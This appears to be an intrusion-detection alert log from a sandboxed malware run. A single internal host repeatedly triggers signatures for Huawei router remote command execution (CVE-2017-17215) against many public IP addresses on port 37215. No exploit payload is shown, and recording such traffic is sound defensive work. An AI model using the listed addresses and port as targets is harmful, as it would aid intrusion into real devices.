                                                        06/13/24-21:33:00.889862TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4532837215192.168.2.14197.182.168.78
                                                        06/13/24-21:32:21.786947TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5916837215192.168.2.14156.131.126.45
                                                        06/13/24-21:32:07.404570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3528637215192.168.2.1441.108.70.185
                                                        06/13/24-21:32:28.048615TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4306237215192.168.2.14197.215.183.132
                                                        06/13/24-21:32:30.127497TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3468637215192.168.2.14156.58.64.228
                                                        06/13/24-21:33:13.229051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4834037215192.168.2.1441.147.23.70
                                                        06/13/24-21:32:56.789158TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3389637215192.168.2.14156.130.182.59
                                                        06/13/24-21:31:57.091258TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5460237215192.168.2.1441.0.201.93
                                                        06/13/24-21:33:07.055536TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4438637215192.168.2.14197.202.20.75
                                                        06/13/24-21:33:13.230828TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4819437215192.168.2.1441.194.50.164
                                                        06/13/24-21:32:01.218454TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3626037215192.168.2.14197.48.241.153
                                                        06/13/24-21:31:57.153200TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3582237215192.168.2.1441.27.151.191
                                                        06/13/24-21:32:34.192493TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5101437215192.168.2.14197.243.165.8
                                                        06/13/24-21:32:30.125732TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4015237215192.168.2.14156.253.193.157
                                                        06/13/24-21:32:30.079428TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3564837215192.168.2.14197.24.45.246
                                                        06/13/24-21:32:38.323377TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4505037215192.168.2.1441.26.190.186
                                                        06/13/24-21:32:58.824365TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3705837215192.168.2.14156.212.247.40
                                                        06/13/24-21:32:42.418944TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4881037215192.168.2.14156.57.210.126
                                                        06/13/24-21:31:57.093735TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5682237215192.168.2.14197.116.225.223
                                                        06/13/24-21:33:09.109315TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5783837215192.168.2.14197.33.203.87
                                                        06/13/24-21:32:30.097020TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4506037215192.168.2.14197.133.131.171
                                                        06/13/24-21:32:54.707511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3473437215192.168.2.14156.233.215.18
                                                        06/13/24-21:33:15.253766TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3617637215192.168.2.1441.147.139.55
                                                        06/13/24-21:32:09.440121TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4553637215192.168.2.14197.225.71.137
                                                        06/13/24-21:32:42.408478TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3363237215192.168.2.1441.21.128.111
                                                        06/13/24-21:32:07.417263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4130837215192.168.2.1441.111.122.100
                                                        06/13/24-21:32:19.730522TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4394637215192.168.2.14156.116.207.211
                                                        06/13/24-21:33:11.158614TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5366037215192.168.2.14197.138.166.248
                                                        06/13/24-21:33:07.059533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5620637215192.168.2.14156.91.10.54
                                                        06/13/24-21:32:52.659290TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4735637215192.168.2.14197.128.12.167
                                                        06/13/24-21:33:00.871151TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5066437215192.168.2.14197.8.17.85
                                                        06/13/24-21:33:07.038353TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4246837215192.168.2.1441.202.98.12
                                                        06/13/24-21:32:13.569538TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4212437215192.168.2.14156.89.174.68
                                                        06/13/24-21:32:52.680720TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5536237215192.168.2.1441.181.65.190
                                                        06/13/24-21:31:59.177678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3683037215192.168.2.14197.192.218.206
                                                        06/13/24-21:32:40.353828TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3654037215192.168.2.1441.235.47.69
                                                        06/13/24-21:33:09.085536TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3838037215192.168.2.1441.236.218.140
                                                        06/13/24-21:32:40.373649TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5359037215192.168.2.1441.84.41.79
                                                        06/13/24-21:33:11.157456TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4208037215192.168.2.1441.110.144.50
                                                        06/13/24-21:33:00.866844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4851437215192.168.2.14156.176.138.172
                                                        06/13/24-21:31:59.197067TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4839037215192.168.2.14156.132.151.48
                                                        06/13/24-21:32:52.660410TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3778237215192.168.2.14197.35.159.220
                                                        06/13/24-21:33:07.042832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5542637215192.168.2.1441.113.100.138
                                                        06/13/24-21:32:40.372517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5612637215192.168.2.14156.116.153.74
                                                        06/13/24-21:32:25.991990TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6038237215192.168.2.1441.139.94.186
                                                        06/13/24-21:31:57.092151TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5580837215192.168.2.14156.119.146.174
                                                        06/13/24-21:32:17.677187TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4172237215192.168.2.1441.211.45.201
                                                        06/13/24-21:32:23.834961TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4212437215192.168.2.1441.45.250.158
                                                        06/13/24-21:32:23.932230TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5358037215192.168.2.14197.13.149.243
                                                        06/13/24-21:32:50.632500TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4174437215192.168.2.14156.42.154.120
                                                        06/13/24-21:32:32.152534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3645837215192.168.2.14197.141.136.21
                                                        06/13/24-21:32:44.451618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4177637215192.168.2.14156.4.144.73
                                                        06/13/24-21:32:42.405100TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5385437215192.168.2.1441.239.102.161
                                                        06/13/24-21:32:25.977422TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3719837215192.168.2.1441.100.121.237
                                                        06/13/24-21:33:09.107155TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5184237215192.168.2.1441.251.215.8
                                                        06/13/24-21:32:13.544062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4055437215192.168.2.14156.135.128.249
                                                        06/13/24-21:32:40.359128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4264437215192.168.2.14197.119.141.115
                                                        06/13/24-21:32:30.101135TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5898237215192.168.2.14156.102.23.205
                                                        06/13/24-21:32:11.485888TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5917437215192.168.2.14197.241.40.252
                                                        06/13/24-21:32:17.696107TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3486837215192.168.2.14156.71.230.99
                                                        06/13/24-21:32:44.475837TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3819237215192.168.2.14197.140.241.105
                                                        06/13/24-21:33:04.991949TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4128637215192.168.2.14156.15.72.208
                                                        06/13/24-21:32:23.837233TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3644237215192.168.2.14156.144.249.159
                                                        06/13/24-21:32:19.751750TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5507037215192.168.2.14156.118.57.145
                                                        06/13/24-21:32:42.420377TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5859437215192.168.2.14197.91.200.51
                                                        06/13/24-21:32:15.608772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4541637215192.168.2.14156.10.163.216
                                                        06/13/24-21:32:23.834905TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5124637215192.168.2.14197.78.74.38
                                                        06/13/24-21:32:36.263888TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5180037215192.168.2.14156.155.107.99
                                                        06/13/24-21:32:01.241642TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4232237215192.168.2.1441.110.70.62
                                                        06/13/24-21:32:05.344321TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5753837215192.168.2.1441.27.35.175
                                                        06/13/24-21:32:17.697657TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4904637215192.168.2.14197.195.158.212
                                                        06/13/24-21:32:32.166805TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4435037215192.168.2.14197.183.35.161
                                                        06/13/24-21:32:52.669123TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4244237215192.168.2.14156.236.245.78
                                                        06/13/24-21:32:54.710921TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5816837215192.168.2.1441.198.253.99
                                                        06/13/24-21:32:01.246018TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5015637215192.168.2.14197.253.197.8
                                                        06/13/24-21:32:13.570290TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3915037215192.168.2.1441.3.180.129
                                                        06/13/24-21:32:11.507830TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4581237215192.168.2.14197.228.140.36
                                                        06/13/24-21:32:44.450318TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4629437215192.168.2.14197.28.90.249
                                                        06/13/24-21:33:00.869765TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3686437215192.168.2.1441.113.78.59
                                                        06/13/24-21:32:28.028219TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3562437215192.168.2.14197.115.227.166
                                                        06/13/24-21:33:09.089241TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4313437215192.168.2.1441.89.175.43
                                                        06/13/24-21:32:11.485324TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5089437215192.168.2.14197.186.219.23
                                                        06/13/24-21:32:52.679625TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6031437215192.168.2.14156.95.249.161
                                                        06/13/24-21:32:28.043070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4338637215192.168.2.1441.255.60.5
                                                        06/13/24-21:32:48.551143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3591037215192.168.2.1441.62.30.72
                                                        06/13/24-21:32:09.457052TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3706437215192.168.2.14156.170.208.57
                                                        06/13/24-21:32:15.606039TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4589037215192.168.2.1441.209.213.96
                                                        06/13/24-21:32:03.306547TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4491237215192.168.2.14197.31.28.209
                                                        06/13/24-21:32:25.997287TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4132637215192.168.2.14197.84.42.64
                                                        06/13/24-21:32:15.633377TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4345437215192.168.2.1441.52.131.140
                                                        06/13/24-21:32:17.671041TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4289037215192.168.2.14156.155.46.16
                                                        06/13/24-21:32:15.636269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3788437215192.168.2.14197.225.247.94
                                                        06/13/24-21:32:15.609352TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5667637215192.168.2.1441.174.224.22
                                                        06/13/24-21:32:50.615110TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5000237215192.168.2.1441.159.192.186
                                                        06/13/24-21:33:00.871428TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3456637215192.168.2.14197.39.170.77
                                                        06/13/24-21:32:44.457504TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4767037215192.168.2.1441.217.39.120
                                                        06/13/24-21:32:01.238286TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4510237215192.168.2.14156.232.36.71
                                                        06/13/24-21:32:54.711380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3999437215192.168.2.14197.218.98.5
                                                        06/13/24-21:32:32.154950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5421637215192.168.2.14156.56.233.227
                                                        06/13/24-21:32:58.821834TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3423037215192.168.2.14197.5.177.85
                                                        06/13/24-21:32:30.095148TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5443237215192.168.2.14156.43.180.52
                                                        06/13/24-21:31:57.133945TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3434037215192.168.2.14156.255.56.160
                                                        06/13/24-21:31:57.092692TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3752837215192.168.2.14156.21.179.125
                                                        06/13/24-21:32:11.510021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3984037215192.168.2.14197.179.143.211
                                                        06/13/24-21:32:48.573678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3512037215192.168.2.14156.45.218.51
                                                        06/13/24-21:33:11.177479TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3282837215192.168.2.14156.27.174.215
                                                        06/13/24-21:32:44.451399TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3586437215192.168.2.14197.252.1.218
                                                        06/13/24-21:32:28.043149TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3931037215192.168.2.1441.250.16.27
                                                        06/13/24-21:32:46.527938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3514037215192.168.2.14197.32.6.248
                                                        06/13/24-21:32:48.556191TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4040237215192.168.2.14156.164.131.134
                                                        06/13/24-21:32:32.151964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5448637215192.168.2.1441.200.52.213
                                                        06/13/24-21:32:54.725586TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4688037215192.168.2.14197.144.238.125
                                                        06/13/24-21:33:04.993673TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5280037215192.168.2.14156.121.131.221
                                                        06/13/24-21:32:21.803562TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5277037215192.168.2.1441.214.117.126
                                                        06/13/24-21:32:23.937311TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4554037215192.168.2.14156.39.209.17
                                                        06/13/24-21:32:58.824741TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4367037215192.168.2.14156.24.159.192
                                                        06/13/24-21:32:03.307393TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3910837215192.168.2.14197.225.71.30
                                                        06/13/24-21:32:34.215838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4415037215192.168.2.14156.28.49.186
                                                        06/13/24-21:32:09.439401TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3518237215192.168.2.14156.142.202.137
                                                        06/13/24-21:32:07.419654TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4014237215192.168.2.14156.181.30.17
                                                        06/13/24-21:32:09.436706TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4346437215192.168.2.14156.95.138.31
                                                        06/13/24-21:32:44.475314TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3995237215192.168.2.14156.30.188.108
                                                        06/13/24-21:32:48.550795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4387037215192.168.2.14156.9.132.104
                                                        06/13/24-21:32:19.752863TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3597237215192.168.2.1441.118.34.34
                                                        06/13/24-21:32:28.027682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3654637215192.168.2.1441.37.117.144
                                                        06/13/24-21:32:17.695492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4995437215192.168.2.14197.156.134.218
                                                        06/13/24-21:33:13.228745TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4385237215192.168.2.14156.41.237.83
                                                        06/13/24-21:31:59.197865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5429437215192.168.2.14156.8.228.71
                                                        06/13/24-21:32:54.725804TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3995037215192.168.2.14156.12.131.138
                                                        06/13/24-21:31:57.153960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5213637215192.168.2.14197.5.170.219
                                                        06/13/24-21:33:11.174179TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4892637215192.168.2.14197.136.20.125
                                                        06/13/24-21:33:13.214290TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5183637215192.168.2.14156.53.46.180
                                                        06/13/24-21:32:11.506506TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4321837215192.168.2.14156.62.69.251
                                                        06/13/24-21:32:09.459120TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5276837215192.168.2.14156.200.130.129
                                                        06/13/24-21:32:15.606499TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5041037215192.168.2.14156.193.187.78
                                                        06/13/24-21:32:01.241922TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3487637215192.168.2.1441.209.91.127
                                                        06/13/24-21:32:07.403315TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3645437215192.168.2.14156.146.74.235
                                                        06/13/24-21:32:46.502617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4227637215192.168.2.14156.74.141.211
                                                        06/13/24-21:32:19.753345TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5221037215192.168.2.1441.25.175.213
                                                        06/13/24-21:32:44.458303TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3565837215192.168.2.1441.36.180.218
                                                        06/13/24-21:33:09.126729TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4901437215192.168.2.14197.172.176.152
                                                        06/13/24-21:32:05.349188TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3300437215192.168.2.1441.98.25.241
                                                        06/13/24-21:32:58.842590TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4105837215192.168.2.14156.83.229.244
                                                        06/13/24-21:33:02.910104TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3465637215192.168.2.14197.117.182.103
                                                        06/13/24-21:32:01.223687TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5048237215192.168.2.14156.227.127.133
                                                        06/13/24-21:33:00.888277TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5849837215192.168.2.14156.78.226.123
                                                        06/13/24-21:32:17.674420TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4955837215192.168.2.14197.26.107.149
                                                        06/13/24-21:32:23.941449TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3619837215192.168.2.1441.240.11.71
                                                        06/13/24-21:32:52.658603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4997037215192.168.2.14156.85.172.44
                                                        06/13/24-21:32:32.169235TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3804437215192.168.2.14197.201.118.10
                                                        06/13/24-21:32:21.802117TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5109437215192.168.2.1441.179.60.118
                                                        06/13/24-21:32:17.694394TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6032437215192.168.2.14197.135.177.52
                                                        06/13/24-21:33:00.886820TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3571637215192.168.2.1441.84.202.220
                                                        06/13/24-21:32:11.508263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5249237215192.168.2.1441.165.26.194
                                                        06/13/24-21:32:40.358433TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4205037215192.168.2.14197.72.138.134
                                                        06/13/24-21:32:50.611738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5912837215192.168.2.14197.162.58.122
                                                        06/13/24-21:32:05.345846TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3765637215192.168.2.1441.217.138.140
                                                        06/13/24-21:32:54.707972TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3759237215192.168.2.1441.140.60.29
                                                        06/13/24-21:32:34.193560TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4009637215192.168.2.14197.141.9.106
                                                        06/13/24-21:32:05.349625TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3460637215192.168.2.14197.80.97.235
                                                        06/13/24-21:32:34.195106TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5193637215192.168.2.14197.116.79.111
                                                        06/13/24-21:33:00.884660TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5612037215192.168.2.1441.241.70.99
                                                        06/13/24-21:32:54.710889TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5620237215192.168.2.14156.206.39.225
                                                        06/13/24-21:32:56.758752TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5405437215192.168.2.14197.24.41.55
                                                        06/13/24-21:32:52.660522TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5559437215192.168.2.1441.203.154.211
                                                        06/13/24-21:33:11.176220TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5213637215192.168.2.14156.186.248.171
                                                        06/13/24-21:32:36.266676TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4057237215192.168.2.14197.60.113.72
                                                        06/13/24-21:32:44.453454TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5363637215192.168.2.1441.104.122.149
                                                        06/13/24-21:33:17.307392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6084237215192.168.2.14197.224.18.154
                                                        06/13/24-21:32:11.486866TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5405237215192.168.2.14156.242.34.241
                                                        06/13/24-21:33:02.908265TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3924437215192.168.2.1441.185.166.178
                                                        06/13/24-21:33:09.087500TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4703237215192.168.2.14197.73.81.98
                                                        06/13/24-21:32:01.241602TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5344037215192.168.2.1441.208.120.64
                                                        06/13/24-21:32:07.402997TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5806837215192.168.2.14197.45.187.133
                                                        06/13/24-21:31:57.091729TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5377237215192.168.2.14197.219.160.109
                                                        06/13/24-21:32:11.509544TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5990637215192.168.2.1441.244.236.101
                                                        06/13/24-21:32:50.632933TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4401437215192.168.2.14197.145.192.121
                                                        06/13/24-21:32:50.629651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3534437215192.168.2.14197.186.32.237
                                                        06/13/24-21:33:00.870919TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3448037215192.168.2.1441.100.226.215
                                                        06/13/24-21:32:54.708673TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3649837215192.168.2.14156.101.90.113
                                                        06/13/24-21:32:03.299050TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5722037215192.168.2.1441.178.85.17
                                                        06/13/24-21:32:23.830956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3436837215192.168.2.1441.134.87.77
                                                        06/13/24-21:32:44.480148TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4929437215192.168.2.14197.211.0.140
                                                        06/13/24-21:32:30.077435TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5434837215192.168.2.14197.216.85.87
                                                        06/13/24-21:32:05.371178TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4924437215192.168.2.14197.25.148.129
                                                        06/13/24-21:31:59.174627TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5871037215192.168.2.14156.199.116.168
